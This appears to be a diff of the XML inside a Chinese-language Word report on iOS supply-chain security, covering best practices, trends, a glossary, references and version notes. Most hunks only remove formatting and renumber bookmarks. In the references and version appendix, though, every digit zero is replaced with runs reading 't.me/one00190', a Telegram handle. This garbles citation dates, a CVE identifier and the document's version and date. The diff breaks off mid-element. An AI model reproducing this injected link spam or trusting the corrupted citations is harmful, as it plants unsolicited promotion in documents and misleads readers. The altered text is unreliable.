@@ -10895,9 +10664,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10929,9 +10695,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10969,28 +10732,21 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc242275497"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      </w:pPr>
+      <w:bookmarkStart w:id="16" w:name="_Toc242275497"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:t>五、供应链安全最佳实践</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="15"/>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc242275498"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="17" w:name="_Toc242275498"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -11003,7 +10759,7 @@
         </w:rPr>
         <w:t>开发阶段</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="16"/>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -11024,12 +10780,6 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11101,12 +10851,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11207,12 +10951,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11277,12 +11015,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11376,12 +11108,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11447,12 +11173,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11546,12 +11266,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11631,12 +11345,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11734,11 +11442,8 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc242275499"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="18" w:name="_Toc242275499"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -11751,7 +11456,7 @@
         </w:rPr>
         <w:t>分发阶段</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="17"/>
+      <w:bookmarkEnd w:id="18"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -11772,12 +11477,6 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11849,12 +11548,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11920,12 +11613,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -11991,12 +11678,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -12090,12 +11771,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -12182,12 +11857,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -12285,11 +11954,8 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc242275500"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="19" w:name="_Toc242275500"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -12302,7 +11968,7 @@
         </w:rPr>
         <w:t>用户层面</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="18"/>
+      <w:bookmarkEnd w:id="19"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -12323,12 +11989,6 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -12400,12 +12060,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -12485,12 +12139,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -12556,12 +12204,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -12683,12 +12325,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -12768,12 +12404,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -12850,28 +12480,21 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc242275501"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      </w:pPr>
+      <w:bookmarkStart w:id="20" w:name="_Toc242275501"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:t>六、趋势与展望</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="19"/>
+      <w:bookmarkEnd w:id="20"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc242275502"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="21" w:name="_Toc242275502"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -12884,14 +12507,11 @@
         </w:rPr>
         <w:t>攻击趋势</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="20"/>
+      <w:bookmarkEnd w:id="21"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">1. </w:t>
@@ -12925,9 +12545,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">2. </w:t>
@@ -12968,9 +12585,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">3. </w:t>
@@ -12992,9 +12606,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">4. </w:t>
@@ -13028,11 +12639,8 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc242275503"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="22" w:name="_Toc242275503"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -13045,14 +12653,11 @@
         </w:rPr>
         <w:t>防御趋势</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="21"/>
+      <w:bookmarkEnd w:id="22"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">1. </w:t>
@@ -13086,9 +12691,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">2. </w:t>
@@ -13122,9 +12724,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">3. </w:t>
@@ -13158,9 +12757,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">4. </w:t>
@@ -13194,11 +12790,8 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc242275504"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="23" w:name="_Toc242275504"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -13211,14 +12804,11 @@
         </w:rPr>
         <w:t>未解决问题</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="22"/>
+      <w:bookmarkEnd w:id="23"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">1. </w:t>
@@ -13240,9 +12830,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">2. </w:t>
@@ -13264,9 +12851,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">3. </w:t>
@@ -13300,9 +12884,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">4. </w:t>
@@ -13324,16 +12905,12 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc242275505"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      </w:pPr>
+      <w:bookmarkStart w:id="24" w:name="_Toc242275505"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:t>附录</w:t>
       </w:r>
       <w:r>
@@ -13348,7 +12925,7 @@
         </w:rPr>
         <w:t>：术语表</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="23"/>
+      <w:bookmarkEnd w:id="24"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -13369,12 +12946,6 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -13446,12 +13017,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -13515,12 +13080,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -13591,12 +13150,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -13660,12 +13213,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -13743,12 +13290,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -13812,12 +13353,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -13885,16 +13420,12 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="_Toc242275506"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      </w:pPr>
+      <w:bookmarkStart w:id="25" w:name="_Toc242275506"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:t>附录</w:t>
       </w:r>
       <w:r>
@@ -13909,14 +13440,26 @@
         </w:rPr>
         <w:t>：参考资料</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="24"/>
+      <w:bookmarkEnd w:id="25"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
       </w:pPr>
       <w:r>
-        <w:t>1. Palo Alto Networks Unit 42. "Malware XcodeGhost Infects 39 iOS Apps." 2015-09.</w:t>
+        <w:t>1. Palo Alto Networks Unit 42. "Malware XcodeGhost Infects 39 iOS Apps." 2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>15-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>9.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13924,7 +13467,25 @@
         <w:ind w:left="280" w:hanging="280"/>
       </w:pPr>
       <w:r>
-        <w:t>2. GitGuardian. "CVE of the month: the supply chain vulnerability hidden for 10 years." 2024-07.</w:t>
+        <w:t>2. GitGuardian. "CVE of the month: the supply chain vulnerability hidden for 1</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> years." 2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>24-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>7.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13932,7 +13493,19 @@
         <w:ind w:left="280" w:hanging="280"/>
       </w:pPr>
       <w:r>
-        <w:t>3. SecurityWeek. "Critical CocoaPods Flaws Exposed Many iOS, macOS Apps to Supply Chain Attacks." 2024-07.</w:t>
+        <w:t>3. SecurityWeek. "Critical CocoaPods Flaws Exposed Many iOS, macOS Apps to Supply Chain Attacks." 2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>24-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>7.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13940,7 +13513,13 @@
         <w:ind w:left="280" w:hanging="280"/>
       </w:pPr>
       <w:r>
-        <w:t>4. Apple. "Building a Trusted Ecosystem for Millions of Apps: A Threat Analysis of Sideloading." 2024.</w:t>
+        <w:t>4. Apple. "Building a Trusted Ecosystem for Millions of Apps: A Threat Analysis of Sideloading." 2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>24.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13948,7 +13527,19 @@
         <w:ind w:left="280" w:hanging="280"/>
       </w:pPr>
       <w:r>
-        <w:t>5. USENIX Security 2026. "Dissecting the Gray-Market of Unauthorized iOS App Distribution." 2026.</w:t>
+        <w:t>5. USENIX Security 2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>26. "Dissecting the Gray-Market of Unauthorized iOS App Distribution." 2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>26.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13956,7 +13547,13 @@
         <w:ind w:left="280" w:hanging="280"/>
       </w:pPr>
       <w:r>
-        <w:t>6. ACM. "iOSModZoo: A Large-Scale Study of Third-Party iOS App Markets." 2026.</w:t>
+        <w:t>6. ACM. "iOSModZoo: A Large-Scale Study of Third-Party iOS App Markets." 2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>26.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13964,7 +13561,19 @@
         <w:ind w:left="280" w:hanging="280"/>
       </w:pPr>
       <w:r>
-        <w:t>7. arXiv. "Characterizing Third-Party Iranian iOS App Stores." 2026-04.</w:t>
+        <w:t>7. arXiv. "Characterizing Third-Party Iranian iOS App Stores." 2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>26-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>4.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13972,7 +13581,13 @@
         <w:ind w:left="280" w:hanging="280"/>
       </w:pPr>
       <w:r>
-        <w:t>8. Apple Developer Forums. "Certificate Revocation Impact." 2021.</w:t>
+        <w:t>8. Apple Developer Forums. "Certificate Revocation Impact." 2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>21.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13980,7 +13595,31 @@
         <w:ind w:left="280" w:hanging="280"/>
       </w:pPr>
       <w:r>
-        <w:t>9. SentinelOne. "CVE-2023-38606: Apple iPadOS Privilege Escalation Flaw." 2026-02.</w:t>
+        <w:t>9. SentinelOne. "CVE-2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>23-386</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>6: Apple iPadOS Privilege Escalation Flaw." 2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>26-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>2.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13988,22 +13627,36 @@
         <w:ind w:left="280" w:hanging="280"/>
       </w:pPr>
       <w:r>
-        <w:t>10. SecurityWeek. "Vulnerability Found in SimpleMDM Apple Device Management Solution." 2019-08.</w:t>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. SecurityWeek. "Vulnerability Found in SimpleMDM Apple Device Management Solution." 2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>19-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:t>8.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="25" w:name="_Toc242275507"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      </w:pPr>
+      <w:bookmarkStart w:id="26" w:name="_Toc242275507"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:t>附录</w:t>
       </w:r>
       <w:r>
@@ -14018,15 +13671,12 @@
         </w:rPr>
         <w:t>：版本与说明</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="25"/>
+      <w:bookmarkEnd w:id="26"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14045,7 +13695,13 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>1.0</w:t>
+        <w:t>1.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14057,7 +13713,43 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>2026-10-07</w:t>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>26-1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
